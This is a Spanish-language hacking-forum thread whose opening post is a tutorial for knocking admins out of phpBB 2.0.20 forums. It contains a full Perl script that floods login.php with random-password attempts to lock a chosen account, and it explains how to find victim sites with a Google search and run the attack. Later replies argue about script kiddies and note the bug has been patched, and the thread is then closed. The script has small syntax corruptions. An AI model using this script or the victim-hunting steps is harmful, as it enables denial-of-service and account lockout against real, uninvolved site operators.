Hola, bueno en este Tutorial enseñare a hacer un DoS a un phpBB 2.0.20, aun que ustedes
Lo pueden hacer a lo que quieran, con tal de tener el Exploits para explotar el bug y ya
Compilado.
Bueno este que dejo yo esta en Perl. Debemos tener el Active Perl para Windows, así podremos compilarlo.
Para descargarlo Clic aquí http://rapidshare.com/files/9702090/ActivePerl-5.8.8.819-MSWin32-x86-267479.msi (http://rapidshare.com/files/9702090/ActivePerl-5.8.8.819-MSWin32-x86-267479.msi)
Claro que para hacer algo debemos saber que vamos a hacer ;)
Ahora, una vez que ya tenemos bajado e instalado el ActivePerl y sabemos que es un DoS debemos pasar a compilarlo (Al Exploit.)
Abrimos el Block de Notas y pegamos esto.
###################################################################################
#!/usr/bin/perl
# For PHPBB 2.0.20
# This Exploit Disable Admin Or other User IN PHPBB Forums For 15 Min
# Discover & Writ By : Hossein-Asgari
# http://simorgh-ev.com
# Comment : PHPBB 2.0.18 Secured Bruteforce Cracking Password !
# BUT :
# If anybody Bruteforce TO ADMIN Account --> Admin Account Is Disable .
# Enjoy !
# Advisory : http://www.simorgh-ev.com/advisory/2006/phpbb-disable-admin.pl.txt
###################################################################################
$host=$ARGV[0>;
$dirc=$ARGV[1>;
$port=$ARGV[2>;
$user=$ARGV[3>;
$dirsend = "$dirc" . "login.php";
print "
-------------------------------------
phpbb-Disable-user.php <Host> </Dir/> <Port> <Admin Username >
--------------------------------------
";
$i=1;
if ($host ne ""){
while($OK ne 1){
use IO::Socket;
my($socket) ="";
if ($socket = IO::Socket::INET->new(PeerAddr => $host ,
PeerPort => $port ,
Proto => "TCP"))
{
$password=rand();
$data = "username="."$user"."&password="."$password"."&redirect=&login=Connexion
";
$length = length $data;
print $socket "POST $dirsend HTTP/1.1
Host: $host
Content-Type: application/x-www-form-urlencoded
Content-Length: $length
$data";
read $socket, $answer, 15;
close($socket);
}
if($answer =~ /HTTP\/(.*?) 302/){$OK = 1;}
$i=$i+"1";
print "$answer
";
print "Send Packet $i ....
" ;
}}
Lo guardamos como phpbb.pl
Acordase que para cada cosa necesitamos su cosa, por ejemplo...Para el bug del phpBB del 2.0.20 este es el Exploit, para otros bug están sus Exploit.
Bueno, ya tenemos al Active Perl, sabemos que es un DoS, tenemos Exploit para el DoS a un phpBB 2.0.20 ahora falta la victima.
Para eso vamos a el famoso amigo Google => www.Google.com.ar
Ahora para buscarlo pondremos en Google "Powered by phpbb 2.0.20" Sin las "".
Bueno buscamos un Foro que sea de phpBB 2.0.20 y para darnos cuenta de que es la versión 2.0.10 debemos ir al final y mirar que diga así. Como la imagen.
(https://hackpr.net/foro/proxy.php?request=http%3A%2F%2Fimg482.imageshack.us%2Fimg482%2F4015%2F2bu5.jpg&hash=8c7ce7ba8a3b2290561ae62cb75b440a0c32b2f4)
Si es así, y esta todo correcto ya tenemos la victima.
Ahora a atacarlo :)
Vamos a Inicio > Ejecutar > Cmd (Para win XP)
Inicio > Ejecutar > Command (Para 98 o posteriores)
Ahora vamos a la dirección donde tenemos el Exploit. Por ejemplo c:/explo/phpbb.pl
Entonces así en la consola (Lo que inicias, el Cmd)
(https://hackpr.net/foro/proxy.php?request=http%3A%2F%2Fimg408.imageshack.us%2Fimg408%2F9483%2F2id7.jpg&hash=43f9d8d3e0d60c7cab7069e447789a491a26ba21)
En mi caso lo cargue c:/xpl/phpbb.pl (Por que yo lo tengo en esa dirección)
(Si tenes win 98 no te olvides poner Perl adelante de la dirección/nombre del Exploit...ósea; Perl phpbb.pl)
Bien, aun no toquemos Intro ahí
Entonces tenemos todo preparado, falta ejecutarlo...
Ahí que agregar la ulr de la victima, por ejemplo ->
(https://hackpr.net/foro/proxy.php?request=http%3A%2F%2Fimg167.imageshack.us%2Fimg167%2F1382%2F3ue4.jpg&hash=54676818e5629f4e86349c50833e54b5996ca008)
Ahora si le damos enter, y empezara.
Lo dejamos ahí hasta que termine :)
Algo así se vera cuando le este enviando los paquetes.
(https://hackpr.net/foro/proxy.php?request=http%3A%2F%2Fimg408.imageshack.us%2Fimg408%2F2995%2F4bh8.jpg&hash=e156e24e475aa8d77972106e5b5989a825599dab)
Y tranquilo, no desesperes...Va a tomarse su tiempo para hacerlo :)
Sólo esperá unos minutos y ya :)
Bueno espero que te allá gustado y que lo hallas logrado ;)
Para enterarte más del bug este, busca en Google sobre el Bug en el phpBB 2.0.20 :) Sabrás la función rápidamente.
By Zutr4
Bueno saludos
Nota: Los "Palabra Censurada en HackPR.NET"/kiddies aprovecharan, pero we...hallá se verán.
no es por aguar la fiesta pero ya parchearon ese bugs XD¡
ahora estan en el 2.0.22 XD¡
oZx, yo hago lo que puedo x)
El manual lo hize cuando erá vulnerable, ahora creo que ya no...Pero almenos podrán remplazar el exploit por otro y pff, poder hacer algo xD
jawjwja sabes hace cuanto lanzaron la versio anterior a la actual XD¡ jawjwaj yo nisikiera estaba en los foros :D
¿Esto en Hack General? ??? ::)
Debería ir en Hack "Palabra Censurada en HackPR.NET", ja ja ja. xD
El DoS es de "Palabra Censurada en HackPR.NET", si vos sos "Palabra Censurada en HackPR.NET" (sin ofender), no incentives a los Usuarios a ser lamers también.
Saludos.
Quote from: Bad-Boy on January 22, 2007, 08:34:27 PM
¿Esto en Hack General? ??? ::)
Debería ir en Hack "Palabra Censurada en HackPR.NET", ja ja ja. xD
El DoS es de "Palabra Censurada en HackPR.NET", si vos sos "Palabra Censurada en HackPR.NET" (sin ofender), no incentives a los Usuarios a ser lamers también.
Saludos.
paso paaa ? tu tienes algo mejor que aportar ? si no mejor quedate callado...
Aja, lo que dice Green es verdad, yo no veo ningun tutorial que aporte x)
Este lo hize por que un amigo tenia problemas para hacerlo y lo ayude con este y luego lo postie, si no te gusta...Mala suerte x)
Pense que aquí la gente era más buena onda, y veo que si, sólo que siempre ahí gente que dicen cosas sin pensarlas....
Saludos.
Buno aky siempre toman todo a el lado malo y no debe de ser asi , deberiamos de dar gracias que esta dando informacion valiosa para todos aquellos que apenas empiezan , ya que no importa que sea para una version vieja ya que mas que todo nos esta enseñando a explotar un bug y eso es bueno para algunos.
tanto alarden que le dan, malvinas jejee siempre me sale en todas las fotos, XD¡ saludos Bad Boys
independiente que sea malvinas u otro, (ojala que estas palabras no esten sensuradas XD¡)
¿que carajo les importa que le digan feo por un foro?
o que le digan uhhh no aportas nada? no van a domir? van a pasar todo el dia pensando en akello?
naa men, por aki nada vale, solo vale leer y nada mas, que las opiniones de los demas les resfale que les valga la de ustedes mismo y digan si coño lo hice bien.
es internet nada es real.
... Aqui como veo les gusta llamar a todos n()()bs ... bueno si se hacen herramientas para hacer ataques DOS es por que se necesitan hacer y no es de n()()bs asi que piensen antes de decirlo..! eso va con todos los que dicen que es de n()()bs!!
Esto en ves de un Tutorial, se convirtio en un Ring de pelea, no importa quien aporte o quien no.
Tema Cerrado
Por el desvio del mismo
-- Esquipy --